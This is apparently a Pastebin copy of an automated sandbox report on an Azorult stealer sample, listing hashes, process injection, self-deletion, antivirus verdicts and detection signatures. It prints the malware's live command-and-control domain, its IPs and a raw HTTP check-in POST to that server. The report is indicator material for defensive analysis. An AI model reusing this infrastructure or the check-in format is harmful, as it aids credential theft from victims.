Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Azorult"
- * MalScore: 10.0
- * File Name: "Exes_a81e3db408b78bc6abc0c4d5a53050d2.exe"
- * File Size: 543102
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "7dd488e91a30fc0eb14e6021d4f6d56ce500dc7c4ed37213e4edcefb54f11396"
- * MD5: "a81e3db408b78bc6abc0c4d5a53050d2"
- * SHA1: "8ad34e7e178e3e4c918485f642eabf9a7a253e0c"
- * SHA512: "658d4ea28d2d46938e8bea140aea9e3757ad9d5e4dad6f8d82cbfbccb00bebefa68f027b29b48f0ebca22ab4be170a53672d222df74c17b55bdca932c13264bf"
- * CRC32: "6FD1DB49"
- * SSDEEP: "12288:9XwOrReFWQFAKYWZqvUPY06ZNwJSrswf3MCSelM34NXZ:9XwOrRsdZ5n6Z2JSDf3MVBIdZ"
- * Process Execution:
- "J4cpJJsKJbow.exe",
- "imgfos.exe",
- "imgfos.exe",
- "cmd.exe"
- * Executed Commands:
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\imgfos.exe\"",
- "imgfos.exe ",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd "
- * Signatures Detected:
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "J4cpJJsKJbow.exe, PID 1528"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url": "opengopro.live:80//luck/index.php"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x00000000, length: 0x00000020"
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x00000000, length: 0x0001ee02"
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x00000000, length: 0x0001ffe0"
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x00000020, length: 0x0001ffc0"
- "self_read": "process: J4cpJJsKJbow.exe, pid: 1528, offset: 0x0001eae8, length: 0x00065e96"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "J4cpJJsKJbow.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://opengopro.live/luck/index.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://opengopro.live/luck/index.php"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd "
- "Description": "Behavioural detection: Injection (Process Hollowing)",
- "Details":
- "Injection": "imgfos.exe(2416) -> imgfos.exe(380)"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "imgfos.exe(2416) -> imgfos.exe(380)"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Behavioural detection: Injection (inter-process)",
- "Details":
- "Description": "CAPE detected the Azorult malware family",
- "Details":
- "Description": "File has been identified by 11 Antiviruses on VirusTotal as malicious",
- "Details":
- "FireEye": "Generic.mg.a81e3db408b78bc6"
- "Cylance": "Unsafe"
- "Cybereason": "malicious.e178e3"
- "APEX": "Malicious"
- "Kaspersky": "UDS:DangerousObject.Multi.Generic"
- "Trapmine": "malicious.high.ml.score"
- "Microsoft": "Trojan:Win32/Wacatac.B!ml"
- "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
- "ESET-NOD32": "Win32/Injector.EHKH"
- "CrowdStrike": "win/malicious_confidence_60% (W)"
- "Qihoo-360": "HEUR/QVM41.1.7D57.Malware.Gen"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\imgfos.exe"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
- * Started Service:
- * Mutexes:
- "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\img.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\imgfos.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd",
- "C:\\Users\\user\\AppData\\Local\\Temp\\img.txt"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\img.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZipSfx.000\\imgfos.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\img.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\J4cpJJsKJbow.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\7ZSfx000.cmd"
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "opengopro.live",
- "answers":
- "data": "104.28.3.74",
- "type": "A"
- "data": "104.28.2.74",
- "type": "A"
- * Domains:
- "ip": "104.28.2.74",
- "domain": "opengopro.live"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "uri": "http://opengopro.live/luck/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "opengopro.live",
- "version": "1.1",
- "path": "/luck/index.php",
- "data": "POST /luck/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: opengopro.live\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "United States",
- "ip": "104.28.2.74",
- "inaddrarpa": "",
- "hostname": "opengopro.live"
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement